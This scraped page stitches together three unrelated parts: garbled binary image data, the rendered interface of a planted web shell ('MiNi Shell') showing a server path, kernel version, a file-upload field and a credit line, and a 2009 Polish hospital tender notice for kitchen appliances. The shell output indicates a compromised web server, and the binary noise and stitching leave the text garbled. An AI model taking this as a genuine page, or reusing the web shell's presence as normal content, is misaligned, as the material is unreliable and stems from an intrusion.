JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/363326-N-2009.html

<p class="kh_header"><b>Brzozów: dostawa sprzętu AGD</b><br>
<b>Numer ogłoszenia: 363326 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Brzozowie. Podkarpacki Ośrodek Onkologiczny im. Ks. Bronisława Markiewicza , ul. Ks. J. Bielawskiego 18, 36-200 Brzozów, woj. podkarpackie, tel. 013 4309587, faks 013 4309587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-brzozow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu AGD.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu AGD do siedziby zamawiającego. 

Szczegółowy opis przedmiotu zamówienia: 


1. Ekspres ciśnieniowy do kawy - opis techniczny, funkcje i wyposażenie:

  pojemność zbiornika na wodę co najmniej 2 L
  moc grzałki co najmniej 1000 W
  system Thermoblock
  system Crema
  ciśnienie co najmniej 15 bar
  wyjmowany zbiornik na wodę
  funkcja expresso/cappuccino/gorąca woda/para
  możliwość zaparzania dwóch filiżanek kawy jednocześnie
  podgrzewacz filiżanek
  łyżeczka - miarka
  sitka 2 szt.

ilość: 33 szt.


2. Komplet garnków ze stali nierdzewnej - 12 elementowy:

grubość ścianek co najmniej 0,8 mm
stal nierdzewna, typ 18/10
kumulujące temperaturę kapslowe dno
miedziana wstawka (5 cm) w denkach
szklane pokrywki
nadający się na wszystkie rodzaje kuchenek 
 
skład kompletu (pojemności i wymiary minimalne):

rondel		1,2 L	 14 cm x 8 cm
garnek	2 L	 16 cm x 10 cm
garnek	2,8 L	 18 cm x 10 cm
garnek 	3,8 L	 20 cm x 12 cm
garnek 	5,9 L	 24 cm x 13 cm
patelnia	2,9 L	 24 cm x 6,5 cm

ilość kompletów: 180 szt.

3. Maszynka do mielenia z szatkownicą, opis techniczny, funkcje i wyposażenie:

moduł szatkownicy w zestawie
metalowa komora mielenia
wydajność mielenia - min. 1,5 kg/min.
moc co najmniej 500 W
zabezpieczenie chroniące silnik przed zniszczeniem w przypadku zablokowania
waga max. 3,5 kg
schowek na przewód
gumowe nóżki antypoślizgowe
komora szatkownicy
popychacz
bęben do tarcia
nożyk
sito o średnicy 4 mm
sito o średnicy 8 mm
sitko do maku o średnicy 2,7 mm
popychacz szatkownicy
miska podająca
miska podająca szatkownicy
bęben do przecierania
bęben do tarcia
bęben do cięcia na plastry
nasadka masarska
wkładka dystansowa
nożyk
sprzęgło

ilość: 116 szt.


4. Kuchenka mikrofalowa, opis techniczny, funkcje i wyposażenie:

średnica talerza obrotowego, min. 270 mm
sterowanie elektroniczne
moc mikrofal, co najmniej 800 W
moc grilla, co najmniej 1000 W
pojemność, co najmniej 21 L
funkcja podgrzewania
ilość zakresów mocy, co najmniej 5 + rozmnażanie
funkcja grilla
obudowa i wnętrze ze stali nierdzewnej
automatyczne programy gotowania, co najmniej 7
blokada przed dziećmi
zegar cyfrowy
sygnał zakończenia pracy 

ilość: 45 szt.


5. Odkurzacz, opis techniczny, funkcje i wyposażenie:

moduł z filtrem wodnym
filtr HEPA
moc, co najmniej 1500 W
poziom hałasu, max. 80 dB
pojemność worka na kurz, co najmniej 3 L
funkcja dmuchawy
neutralizator piany
schowek na akcesoria
rura teleskopowa
ssawko - szczotka przełączalna 
elastyczny wąż flexi
pozycja parkowania
zasięg odkurzacza, co najmniej 9 m
filtr ochrony silnika
filtr powietrza chłodzącego silnik
ssawka mała
szczotka mała
ssawka szczelinowa

ilość: 127 szt.


6. Opiekacz elektryczny (mini piecyk), opis techniczny, funkcje i wyposażenie:
 
pojemność co najmniej 9 L
funkcje podgrzewania, grilowania i opiekania
wyjmowany ruszt
duże okienko podglądowe obejmujące co najmniej ? powierzchni czołowej opiekacza
moc co najmniej 1200 W

ilość: 14 szt.


7. Krajalnica, opis techniczny, funkcja i wyposażenie:

moc, co najmniej 200 W
płynna regulacja grubości krojenia
zabezpieczenie przed przypadkowym uruchomieniem
zabezpieczenie przed przypadkowym wysunięciem wózka
nóż
dociskacz
tacka 
wózek
gumowe nóżki antypoślizgowe
nastawiak 
zakres krojenia 0 - 15 mm

ilość: 65 szt.


8. Sokowirówka, opis techniczny, funkcje i wyposażenie:

moc, co najmniej 300 W
stabilizator obrotów
przezroczysta pokrywa
misa do odprowadzania soku
popychacz produktów
sitko ze stali nierdzewnej
pojemnik na miąższ, poj. co najmniej 3 L 
odejmowalny zbiornik na miąższ

ilość: 27 szt.


9. Żelazko: opis techniczny, funkcje i wyposażenie:

moc co najmniej 1900 W
uderzenie pary w pionie
obrotowy przewód
pojemność zbiornika na wodę co najmniej 280 ml
wytwarzanie pary co najmniej 43 g/min.
stopa podwójnie ceramiczna
prasowanie na sucho i z parą
funkcja samooczyszczania
system antykapania
spryskiwacz
wskaźnik poziomu wody 
pojemnik do nalewania wody
regulacja ilości wytwarzanej pary

ilość: 55 szt.


10. Toster - opis techniczny, funkcje i wyposażenie:

ilość tostów - 2
moc co najmniej 650 W
co najmniej 5 ustawień czasu opiekania
funkcja automatycznego centrowania pieczywa
opiekanie kromek
odgrzewanie tostów
możliwość rozmrażania pieczywa
ruszt do opiekania bułek
tacka na okruchy
manualne zatrzymanie opiekania

ilość: 23 szt.


11. Komplet sztućców 72 elementowy, ze stali nierdzewnej, sztućce nadające się do     mycia w zmywarce, pakowane w walizce  
       grubości min.: łyżka: 2,5 mm, łyżeczka: 2 mm 

       skład kompletu:

łyżka 12 szt.
widelec 12 szt.
nóż 12 szt.
łyżeczka 12 szt.
łyżeczka do sałatek 1 szt.
łyżeczka do cukru 1 szt.
widelec do zakąsek 1 szt.
widelec do ciasta 12 szt.
łopatka do ciasta 1 szt.
łyżka stołowa 2 szt.
widelec do sałatek 1 szt.
nabierarka do sosu 1 szt.
nabierarka wazowa 1 szt.
łyżka stołowa 1 szt.
szczypce do cukru 1 szt.

ilość: 75 kompletów


12. Komplet sztućców 24 elementowy, ze stali nierdzewnej, sztućce nadające się do     mycia w zmywarce, pakowane w walizce  
       grubości min.: łyżka: 2,5 mm, łyżeczka: 2 mm 

       skład kompletu:

nóż 6 szt.
widelec 6 szt.
łyżka 6 szt.
łyżeczka 6 szt.

ilość: 26 kompletów


13. Patelnia. Korpus wykonany z utwardzonego tlenkami aluminium, powłoka tytanowo - ceramiczna, grubość dna co najmniej 7 mm, średnica co najmniej 
       28 cm, wysokość co najmniej 5 cm. 
  
ilość: 52 szt.

Zamawiający wymaga aby wszystkie zaoferowane produkty były fabrycznie nowe, rok produkcji 2009, nie używane. Minimalna wymagana gwarancja na wszystkie wyroby 24 miesiące.
Wykonawca zobowiązany jest podać w ofercie nazwę producenta zaoferowanego wyrobu, oraz pełną nazwę lub typ wyrobu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 29.70.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać wykonawcy:
spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych czyli:
a)posiadający uprawnienia do wykonywania działalności objętej przedmiotem zamówienia,
b)posiadający niezbędną wiedzę i doświadczenie oraz potencjał techniczny do wykonania zamówienia,
c)znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegający wykluczeniu z postępowania o udzielenie zamówienia publicznego
Zamawiający oceni spełnianie przez wykonawców powyższych warunków na podstawie wymaganych przez zamawiającego dokumentów, określonych w punkcie 7 specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)Oferta.
b)Oświadczenie o spełnianiu warunków wymaganych od wykonawców biorących udział w niniejszym postępowaniu na podstawie art. 44 ustawy Prawo zamówień publicznych zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ.
c)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert.
d)W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo osoby reprezentującej wspólnie działających wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania, oraz określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane przez wszystkich wykonawców.
e)Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie - wykonawca powinien wykazać się realizacją co najmniej jednej dostawy (na podstawie jednej umowy, lub więcej niż jednej umowy zawartych na podstawie jednej procedury      o udzielenie zamówienia publicznego) odpowiadającej swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia. 
Za dostawę odpowiadającą wartością dostawie stanowiącej przedmiot zamówienia zamawiający uzna dostawę o wartości co najmniej 60 % wartości brutto oferty wykonawcy złożonej w niniejszym postępowaniu.
f)Informację o ewentualnym powierzeniu części prac podwykonawcom.
g)Zaświadczenie lub zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że poprzez odpowiednie odniesienie dokładnie oznaczone produkt będący przedmiotem dostawy odpowiada określonym normom jakości, wymaganym od danego produktu w obrocie i przy stosowaniu tj: deklarację zgodności CE producenta lub certyfikat CE.
h)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów podmiotowych, o których mowa w punkcie 7, wykonawca składa dokumenty określone w § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mają być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-brzozow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Brzozowie
Podkarpacki Ośrodek Onkologiczny Im. Ks. B. Markiewicza
ul. Ks. J. Bielawskiego 18
36-200 Brzozów
Nr tel i fax (013) 4309587.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 10:00, miejsce: Szpital Specjalistyczny w Brzozowie, Podkarpacki Ośrodek Onkologiczny 
im. Ks. B. Markiewicza, ul. Ks. J. Bielawskiego 18, sekretariat, budynek administracji..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com